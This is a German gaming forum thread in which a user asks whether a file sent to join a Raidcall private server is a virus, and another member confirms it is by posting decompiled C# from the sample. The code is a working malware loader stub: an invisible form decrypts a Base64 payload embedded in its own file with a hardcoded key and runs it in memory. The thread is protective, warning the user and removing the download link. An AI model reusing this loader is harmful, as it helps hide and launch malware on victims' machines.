Raidcall Privat Server = Virus?

dragonbloot · 12/18/2014, 14:10

Hey, Ich habe mir heute Raidcall runtergeladen um mit ein Paar Leuten Counter Strike zu spielen ( sie haben mich in ihren clan oder wie mans nennen möchte eingeladen )

Als Ich es fertig gedownlaodet hatte, meinte der eine, dass Ich eine Datei, aus seiner Dropbox, downloaden soll um auf deren Privat Server zu kommen:
[Link entfernt, damit es niemand Downloaded]

Habe sie mir Gedownloadet und in Virustotal Prüfen lassen:

Stimmt es, dass es nur zum Verbinden ist oder ist das ein Virus oder ein Steam Keylogger oder ähnliches?

Requi · 12/18/2014, 14:39

Ist ein Virus. Holt sich die Bytes des eigentlichen Virus' aus den Resourcen vom Programm und führt es dann aus.

Code:

public byte[] docinho(byte[] D8bw)
        {
            string str = ".";
            Activator.CreateInstance(AppDomain.CurrentDomain.Load(D8bw).GetType(string.Concat("PE", str, "PE")));
            return null;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            string[] strArrays = Strings.Split(File.ReadAllText(Assembly.GetExecutingAssembly().Location), string.Concat("i", this.kokozi), -1, CompareMethod.Binary);
            this.docinho(this.putaya(Convert.FromBase64String(strArrays[1]), "jP4svMBpSY2ZM2SP"));
        }

        public byte[] GetBytes(string str)
        {
            return Encoding.Default.GetBytes(str);
        }

        [DebuggerStepThrough]
        private void InitializeComponent()
        {
            this.SuspendLayout();
            this.AutoScaleDimensions = new SizeF(6f, 13f);
            this.AutoScaleMode = AutoScaleMode.Font;
            this.ClientSize = new Size(124, 0);
            this.Name = "Form1";
            this.Opacity = 0;
            this.ShowInTaskbar = false;
            this.Text = "Bagod";
            this.ResumeLayout(false);
        }

        public byte[] putaya(byte[] input, string pass)
        {
            byte[] numArray;
            MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
            try
            {
                byte[] numArray1 = new byte[32];
                byte[] numArray2 = mD5CryptoServiceProvider.ComputeHash(this.GetBytes(pass));
                Array.Copy(numArray2, 0, numArray1, 0, 16);
                Array.Copy(numArray2, 0, numArray1, 15, 16);
                this.pobinho.Key = numArray1;
                this.pobinho.Mode = CipherMode.ECB;
                ICryptoTransform cryptoTransform = this.pobinho.CreateDecryptor();
                byte[] numArray3 = input;
                numArray = cryptoTransform.TransformFinalBlock(numArray3, 0, checked((int)numArray3.Length));
            }
            catch (Exception exception)
            {
                ProjectData.SetProjectError(exception);
                ProjectData.ClearProjectError();
                return null;
            }
            return numArray;
        }

Hurt Locker · 12/18/2014, 14:39

einfach sein lassen und fertig

dragonbloot · 12/18/2014, 14:40

Gut, dass ichs nicht geöffnet hab ^^

Requi · 12/18/2014, 14:45

Wär nett, wenn du den Download Link noch entfernst, dass sich niemand infizierst.

dragonbloot · 12/18/2014, 15:00

Okay, werd ich machen ^^